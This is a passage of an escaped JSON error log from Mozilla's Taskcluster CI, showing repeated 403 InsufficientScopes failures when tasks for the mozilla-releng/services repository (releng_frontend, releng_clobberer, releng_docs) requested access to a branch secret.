\\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.537Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.537Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"PRaBZB-XQuyLR-sqgWhpwg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.537Z\\\"\\n}\\n  time:     2016-09-23T13:09:59.699Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"f-g9IyM4TKeOJEukIugAgA\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_frontend\",\n                        \"description\": \"Test, build and deploy releng_frontend\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"15b42d2b28726354aa91a44d09e63fcadee3cbaf\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:59.537Z\",\n                    \"deadline\": \"2016-09-24T13:09:59.537Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"PRaBZB-XQuyLR-sqgWhpwg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:59.537Z\"\n                },\n                \"time\": \"2016-09-23T13:09:59.699Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"ah7Ejt-JTn-nBUrhDSslBg\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"15b42d2b28726354aa91a44d09e63fcadee3cbaf\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.535Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.535Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"PRaBZB-XQuyLR-sqgWhpwg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.535Z\\\"\\n}\\n  time:     2016-09-23T13:09:59.703Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"ah7Ejt-JTn-nBUrhDSslBg\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"15b42d2b28726354aa91a44d09e63fcadee3cbaf\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.535Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.535Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"PRaBZB-XQuyLR-sqgWhpwg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.535Z\\\"\\n}\\n  time:     2016-09-23T13:09:59.703Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"ah7Ejt-JTn-nBUrhDSslBg\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_clobberer\",\n                        \"description\": \"Test, build and deploy releng_clobberer\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_clobberer\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"15b42d2b28726354aa91a44d09e63fcadee3cbaf\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:59.535Z\",\n                    \"deadline\": \"2016-09-24T13:09:59.535Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"PRaBZB-XQuyLR-sqgWhpwg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:59.535Z\"\n                },\n                \"time\": \"2016-09-23T13:09:59.703Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"V-DBw7V-TqqHGipSW8SF4Q\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"15b42d2b28726354aa91a44d09e63fcadee3cbaf\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.535Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.535Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"PRaBZB-XQuyLR-sqgWhpwg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.535Z\\\"\\n}\\n  time:     2016-09-23T13:09:59.702Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"V-DBw7V-TqqHGipSW8SF4Q\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"15b42d2b28726354aa91a44d09e63fcadee3cbaf\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.535Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.535Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"PRaBZB-XQuyLR-sqgWhpwg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.535Z\\\"\\n}\\n  time:     2016-09-23T13:09:59.702Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"V-DBw7V-TqqHGipSW8SF4Q\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_docs\",\n                        \"description\": \"Test, build and deploy releng_docs\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_docs\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"15b42d2b28726354aa91a44d09e63fcadee3cbaf\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:59.535Z\",\n                    \"deadline\": \"2016-09-24T13:09:59.535Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"PRaBZB-XQuyLR-sqgWhpwg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:59.535Z\"\n                },\n                \"time\": \"2016-09-23T13:09:59.702Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    